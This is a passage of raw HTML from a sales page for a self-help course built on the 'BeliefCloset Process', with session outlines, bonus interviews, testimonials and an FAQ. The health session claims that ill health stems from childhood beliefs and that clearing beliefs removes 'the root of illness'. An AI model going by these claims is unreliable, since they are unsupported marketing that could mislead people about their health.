class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\r\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\r\n\r\n<p><strong> In Session 1, you will:</strong></p>\r\n\r\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\r\nLearn which ones keep you stuck, preventing you from having what you want in life\r\nExperience a process that returns you to your True Self, the home of inner joy and bliss\r\nBegin to work with, not against, your subconscious mind – where your beliefs reside\r\n\r\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\r\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\r\n\r\n<p><strong> In Session 2, you will:</strong></p>\r\n\r\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\r\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\r\nSee your own magnificence through a new clear lens of your own beauty and joy\r\n\r\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\r\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\r\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\r\n\r\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\r\n\r\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\r\n\r\n<p><strong> In Session 3, you will:</strong></p>\r\n\r\nIdentify old beliefs that stand between you and creating the life you want\r\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\r\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\r\n\r\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\r\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\r\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\r\n\r\n<p>&nbsp;</p>\r\n\r\n<p><strong> In Session 4, you will:</strong></p>\r\n\r\nLook deeply into the childhood patterns that enabled you to survive and thrive\r\nSee which of your beliefs now interfere with your intimate relationships\r\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\r\n\r\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\r\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\r\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\r\n\r\n<p><strong> In Session 5, you will:</strong></p>\r\n\r\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\r\nRemove beliefs that create stumbling blocks in the way of natural abundance\r\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\r\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\r\n\r\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\r\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\r\n\r\n<p><strong> In Session 6, you will:</strong></p>\r\n\r\nIdentify old beliefs that stand between you and vibrant health\r\nRecognize beliefs that make you vulnerable to disease and injury\r\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\r\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\r\n\r\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\r\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\r\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\r\n\r\n<p><strong> In Session 7, you will:</strong></p>\r\n\r\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\r\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\r\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\r\n\r\n<p></p>\r\n<p>&nbsp;</p>\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\r\n<p>&nbsp;</p>\r\n\r\nBonus #1:  <strong>Love:  What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\r\n\r\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\r\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\r\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\r\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\r\n\r\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\r\n\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\r\n\r\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\nBonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong>\r\n\r\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\r\n\r\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\r\n\r\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\r\n\r\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\r\n\r\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\r\n\r\nBe called to awaken your already-powerful ability to create the life of your dreams\r\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\r\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\r\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\r\nLearn a process that can strengthen your power of intention\r\n\r\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\nBonus #5:<strong> Change Your Beliefs eBook</strong>\r\n\r\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\r\n\r\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\r\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\r\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\r\n\r\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\nBonus #6: <strong>Complete Transcripts of the Course</strong>\r\n\r\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\r\n\r\n<p>&nbsp;</p>\r\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\r\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\r\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\r\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\r\n<h1 id="package"></h1>\r\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\r\n<p>&nbsp;</p>\r\n\r\n<h1>Purchase Today and You''ll Receive:</h1>\r\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\r\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\r\n<p>	<strong>=&gt; <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\r\n<strong>=&gt; <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\r\n<strong>=&gt; <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\r\n<strong>=&gt; <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\r\n<strong>=&gt; <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\r\n<strong>=&gt; <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\r\n<strong>=&gt; <em>Professional Coaching Sessions:</strong> </em> Optional.</p>\r\n\r\n<p>&nbsp;</p>\r\n\r\n<p>&nbsp;</p>\r\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\r\n<p style="text-align: center">OR</p>\r\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\r\n\r\n<p>&nbsp;</p>\r\n\r\n<h1>Satisfaction Guaranteed</h1>\r\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\r\n<p>&nbsp;</p>\r\n<h1>About Lion Goodman</h1>\r\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\r\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\r\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\r\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n\r\n<h1>Praise for Lion and Clear Your Beliefs</h1>\r\n\r\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\r\n<strong>– G. J., software developer</strong>\r\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\r\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\r\n\r\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\r\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\r\n\r\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\r\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\r\n\r\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\r\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\r\n\r\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\r\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\r\n\r\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\r\n<strong>~ T. L., Healer, Stamford, CT </strong>\r\n\r\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\r\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\r\n\r\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\r\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\r\n\r\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\r\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\r\n\r\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\r\n<strong>~ C.T., Performance and Life Coach</strong>\r\n\r\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\r\n<strong>– M.M., International Business Consultant</strong>\r\n\r\n<p>&nbsp;</p>\r\n\r\n<p>&nbsp;</p>\r\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\r\n<p style="text-align: center">OR</p>\r\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\r\n\r\n<p>&nbsp;</p>\r\n<h1>Satisfaction Guaranteed</h1>\r\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\r\n<p>&nbsp;</p>\r\n<h1>Frequently Asked Questions</h1>\r\n\r\n<p><strong>Q: What is a virtual course?</strong></p>\r\n\r\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\r\n\r\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\r\n\r\n<p><strong>Q: How long will I have access to the course?</strong></p>\r\n\r\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\r\n\r\n<p><strong>Q: Are there scholarships available?</strong></p>\r\n\r\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\r\n\r\n<p><strong>Q: What is your refund policy?</strong></p>\r\n\r\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\r\n\r\n<p><strong>Q: How can I reach Customer Support?</strong></p>\r\n\r\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\r\n\r\n<p><strong>Q: What is your Privacy Policy?</strong></p>\r\n\r\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\r\n\r\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\r\n\r\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with 